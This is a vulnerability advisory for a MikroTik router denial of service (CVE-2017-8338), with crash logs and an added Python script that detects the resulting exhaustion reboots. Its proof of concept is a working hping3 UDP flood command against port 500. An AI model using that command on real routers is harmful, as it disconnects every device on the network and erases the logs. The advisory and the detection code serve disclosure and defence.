################
#Exploit Title: MikroTik UDP Flood Denial of Service | kernel failure
#Reference: https://www.vulnerability-lab.com/get_content.php?id=2064
#CVE: CVE-2017-8338
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : V-6.38.5
#Exploit Tested on: Parrot Security OS
#Date: 09-05-2017
#Category: Network Appliance
#Author Mail : hosein.askari@aol.com
#Description: A vulnerability in MikroTik version 6.38.5 could allow an unauthenticated remote attacker to exhaust all available CPU with a flood of UDP packets on port 500 (used for L2TP over IPsec). The affected router stops accepting new connections, all devices are disconnected from the router, and all logs are removed automatically.
###############
Proof of Concept (PoC):
The denial of service vulnerability can be exploited by remote attackers without a user account or user interaction.
To demonstrate or reproduce the vulnerability, follow the steps below.
hping3 --udp -p 6000 --destport 500 --flood [router's IP]
#########################
#Log:
apr/27/2017 04:37:47 system,error,critical kernel failure in previous boot
apr/27/2017 04:37:47 system,error,critical out of memory condition was detected
apr/27/2017 04:33:36 system,error,critical router was rebooted without proper shutdown by watchdog timer
########################
#Sample of "CPU Usage":
[admin@MikroTik] > system resource monitor
cpu-used: 100%
cpu-used-per-cpu: 100%
free-memory: 2487KiB
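
For monitoring affected routers, the log lines and resource readings above can be checked automatically. The following is an added detection example, not part of the original advisory or MikroTik's tooling; the function names, the 10-minute window and the CPU and free-memory thresholds are assumptions chosen for illustration.

```python
import re
from datetime import datetime, timedelta

MONTHS = "jan feb mar apr may jun jul aug sep oct nov dec".split()
# Critical messages exactly as they appear in the advisory's log excerpt.
SIGNATURES = {
    "kernel failure in previous boot": "kernel_failure",
    "out of memory condition was detected": "out_of_memory",
    "router was rebooted without proper shutdown by watchdog timer": "watchdog_reboot",
}
LOG_RE = re.compile(r"^(\w{3})/(\d{2})/(\d{4}) (\d{2}):(\d{2}):(\d{2}) ([\w,]+) (.+)$")

def parse_log(text):
    """Return (timestamp, tag) for each critical line matching a signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m or m.group(1).lower() not in MONTHS:
            continue
        mon, day, year, hh, mm, ss, topics, msg = m.groups()
        tag = SIGNATURES.get(msg.strip())
        if tag and "critical" in topics.split(","):
            when = datetime(int(year), MONTHS.index(mon.lower()) + 1, int(day),
                            int(hh), int(mm), int(ss))
            hits.append((when, tag))
    return hits

def exhaustion_reboot(hits, window=timedelta(minutes=10)):
    """True when all three signatures are present and span at most `window` (assumed)."""
    if {tag for _, tag in hits} != set(SIGNATURES.values()):
        return False
    times = [when for when, _ in hits]
    return max(times) - min(times) <= window

def under_pressure(monitor_text, cpu_limit=95, min_free_kib=8192):
    """Check `system resource monitor` output against assumed alert thresholds."""
    cpu = re.search(r"^\s*cpu-used:\s*(\d+)%", monitor_text, re.M)
    mem = re.search(r"^\s*free-memory:\s*([\d.]+)(KiB|MiB)", monitor_text, re.M)
    if not cpu or not mem:
        return False
    free_kib = float(mem.group(1)) * (1024 if mem.group(2) == "MiB" else 1)
    return int(cpu.group(1)) >= cpu_limit and free_kib < min_free_kib

# Sample input copied from the advisory text above.
SAMPLE_LOG = """\
apr/27/2017 04:37:47 system,error,critical kernel failure in previous boot
apr/27/2017 04:37:47 system,error,critical out of memory condition was detected
apr/27/2017 04:33:36 system,error,critical router was rebooted without proper shutdown by watchdog timer
"""
SAMPLE_MONITOR = "cpu-used: 100%\ncpu-used-per-cpu: 100%\nfree-memory: 2487KiB\n"
```

Because the description states that logs are removed after the crash, the log check is only useful when the router forwards its log to a remote collector.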